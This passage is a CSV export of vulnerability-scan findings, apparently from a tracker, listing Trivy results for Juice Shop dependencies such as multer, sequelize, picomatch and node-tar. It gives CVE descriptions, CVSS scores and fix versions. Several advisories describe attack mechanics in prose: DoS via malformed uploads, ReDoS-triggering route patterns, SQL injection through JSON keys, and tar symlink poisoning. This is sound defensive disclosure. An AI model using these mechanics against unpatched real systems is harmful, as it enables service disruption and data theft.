Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,bd7c5d742836d0352509a8474ed0a0c95c51a5a63381ad5fc8f27b95701c4f33,171,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.369324+00:00,,,,,0,[],2.0.0,,S1,False,,,,,,,,False,https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 NEWLINE https://github.com/expressjs/multer/pull/1120 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-47935,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-47935 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.369276+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-47935,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.373195+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,248,2026-05-12,,,"Multer vulnerable to Denial of Service from maliciously crafted requests NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,d54a393560504cbe27d8c6511ce8e775584da954e8e529f7c193cdc23ade5220,172,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.373249+00:00,,,,,0,[],2.0.0,,S1,False,,,,,,,,False,https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 NEWLINE https://github.com/expressjs/multer/issues/1176 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-47944,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-47944 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.373203+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-47944,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.376708+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,248,2026-05-12,,,"multer: Multer vulnerable to Denial of Service via unhandled exception NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.1 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,fff2040ca8b13c9b59000f6cdf210be92bb31f2262e7034a504c81950bff1f30,173,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.376770+00:00,,,,,0,[],2.0.1,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-48997 NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9 NEWLINE https://github.com/expressjs/multer/issues/1233 NEWLINE https://github.com/expressjs/multer/pull/1256 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-48997 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-48997,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-48997 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.376716+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-48997,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.380531+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,248,2026-05-12,,,"multer: Multer Denial of Service NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.2 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,33b43b94f6fc1e88bef206211995c8a1beec0c7191fa649e7364a8811dfdd380,174,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.380590+00:00,,,,,0,[],2.0.2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-7338 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-7338 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-7338,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-7338 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.380539+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-7338,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.384677+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,772,2026-05-12,,,"multer: Multer: Denial of Service via dropped file upload connections NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.1.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,0f2bfe0f94114d147559ea83b2bb251cc8e430f21b545a814cfd9a6d05d7a651,175,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.384731+00:00,,,,,0,[],2.1.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-2359 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-2359 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-2359,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-2359 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.384685+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-2359,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.388609+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,459,2026-05-12,,,"multer: Multer: Denial of Service via malformed requests NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.1.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,81c973b6cf74ef76cc96f6c9b6db9ecd909b56649bde3a0932633b49bd77b2b9,176,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.388666+00:00,,,,,0,[],2.1.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-3304 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-3304 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-3304,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-3304 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.388618+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-3304,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.392395+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,674,2026-05-12,,,"multer: Multer: Denial of Service via malformed requests NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.1.1 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,b86aaf9067f8bea4cf2033e9aadb9fd7db3a811a1fd1e6bb23e31ef647e8f284,177,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.392449+00:00,,,,,0,[],2.1.1,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-3520 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-3520 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-3520,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-3520 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.392402+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-3520,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],path-to-regexp,0.1.12,2026-05-12 17:37:05.399975+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"path-to-regexp: path-to-regexp: Denial of Service via catastrophic backtracking from malformed URL parameters NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 0.1.13 NEWLINE NEWLINE Impact: NEWLINE NEWLINE A bad regular expression is generated any time you have three or more parameters within a single segment, separated by something that is not a period (.). For example, /:a-:b-:c or /:a-:b-:c-:d. The backtrack protection added in path-to-regexp@0.1.12 only prevents ambiguity for two parameters. With three or more, the generated lookahead does not block single separator characters, so capture groups overlap and cause catastrophic backtracking. 
NEWLINE NEWLINE Patches: NEWLINE NEWLINE Upgrade to path-to-regexp@0.1.13 NEWLINE NEWLINE Custom regex patterns in route definitions (e.g., /:a-:b([^-/]+)-:c([^-/]+)) are not affected because they override the default capture group. NEWLINE NEWLINE Workarounds: NEWLINE NEWLINE All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change /:a-:b-:c to /:a-:b([^-/]+)-:c([^-/]+). NEWLINE NEWLINE If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/path-to-regexp/package.json,,True,,False,False,,False,,4f8077a7f33e123fb83c2d918a9d7f4db702222c3cdd8285f390600b9c9b2ba5,179,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.400033+00:00,,,,,0,[],0.1.13,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4867 NEWLINE https://blakeembrey.com/posts/2024-09-web-redos NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/advisories/GHSA-9wv6-86v2-598j NEWLINE https://github.com/pillarjs/path-to-regexp NEWLINE https://github.com/pillarjs/path-to-regexp/releases/tag/v.0.1.13 NEWLINE https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-37ch-88jc-xwx2 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4867 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4867,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-4867 Path-to-Regexp 0.1.12,False,False,,2026-05-12 17:37:05.399984+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4867,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],picomatch,2.3.1,2026-05-12 17:37:05.403820+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"picomatch: 
Picomatch: Regular Expression Denial of Service via crafted extglob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.0.4, 3.0.2, 2.3.2 NEWLINE NEWLINE Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/picomatch/package.json,,True,,False,False,,False,,9ad6ef2496fd64df001c54581ed435848d39f4bb46aed204054fe729892c0539,180,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.403969+00:00,,,,,0,[],"4.0.4, 3.0.2, 2.3.2",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33671 NEWLINE https://github.com/micromatch/picomatch NEWLINE https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d NEWLINE https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33671 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33671,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33671 Picomatch 2.3.1,False,False,,2026-05-12 17:37:05.403915+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33671,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],picomatch,4.0.3,2026-05-12 17:37:05.411292+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.0.4, 3.0.2, 2.3.2 NEWLINE NEWLINE Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. 
In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tinyglobby/node_modules/picomatch/package.json,,True,,False,False,,False,,02846100c59522b940085c3539597e1a5275a03c01e688aa9e1d73a86b331196,182,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.411346+00:00,,,,,0,[],"4.0.4, 3.0.2, 2.3.2",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33671 NEWLINE https://github.com/micromatch/picomatch NEWLINE https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d NEWLINE https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33671 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33671,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33671 Picomatch 4.0.3,False,False,,2026-05-12 17:37:05.411300+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-33671,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],sanitize-html,1.4.2,2026-05-12 17:37:05.428248+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,sanitize-html: insecure global regular expression replacement logic may lead to ReDoS NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.7.1 NEWLINE NEWLINE The package sanitize-html before 2.7.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure global regular expression replacement logic of HTML comment removal. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/sanitize-html/package.json,,True,,False,False,,False,,5336cfa12cf3900d3fb926e6a85d22a47c2bc12db14156286dbfe08c9a3b5e82,186,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.428315+00:00,,,,,0,[],2.7.1,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-25887 NEWLINE https://github.com/apostrophecms/sanitize-html/commit/b4682c12fd30e12e82fa2d9b766de91d7d2cd23c NEWLINE https://github.com/apostrophecms/sanitize-html/pull/557 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-25887 NEWLINE https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3008102 NEWLINE https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-2957526 NEWLINE https://ubuntu.com/security/notices/USN-7464-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-25887,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-25887 Sanitize-HTML 1.4.2,False,False,,2026-05-12 17:37:05.428255+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-25887,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],sequelize,6.37.7,2026-05-12 17:37:05.460052+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N,7.5,,,89,2026-05-12,,,"sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE 
**Fixed version:** 6.37.8 NEWLINE NEWLINE Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS ) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sequelize/package.json,,True,,False,False,,False,,9b71ed405cfa75921c2ba47925c77c12c448ef2f56505b33fc141db2c484ef26,194,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.460105+00:00,,,,,0,[],6.37.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-30951 NEWLINE https://github.com/sequelize/sequelize NEWLINE https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-30951 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-30951,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-30951 Sequelize 6.37.7,False,False,,2026-05-12 17:37:05.460059+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-30951,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],socket.io-parser,4.0.5,2026-05-12 17:37:05.467773+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,20,2026-05-12,,,"socket.io: Socket.IO: Denial of Service due to excessive buffering of specially crafted packets NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.3.5, 3.4.4, 4.2.6 NEWLINE NEWLINE Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. 
Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/socket.io-parser/package.json,,True,,False,False,,False,,2e7c7577bec1230199323bc9ab99ba299f2deaf4d36121e9c1812aee010658bb,196,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.467828+00:00,,,,,0,[],"3.3.5, 3.4.4, 4.2.6",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33151 NEWLINE https://github.com/socketio/socket.io NEWLINE https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4 NEWLINE https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf NEWLINE https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78 NEWLINE https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33151 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33151,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33151 socket.io-parser 4.0.5,False,False,,2026-05-12 17:37:05.467781+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33151,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.476089+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N,8.2,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.3 NEWLINE NEWLINE node-tar is a Tar for Node.js. 
The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,d15611f52a7c1ebace4796e595cbd4bd9cd55de60bd9c2e03251d4200e3b6474,198,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.476174+00:00,,,,,0,[],7.5.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23745 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23745 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23745,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23745 Tar 4.4.19,False,False,,2026-05-12 17:37:05.476101+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23745,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.480559+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L,8.8,,,176,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.4 NEWLINE NEWLINE node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. 
On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue. 
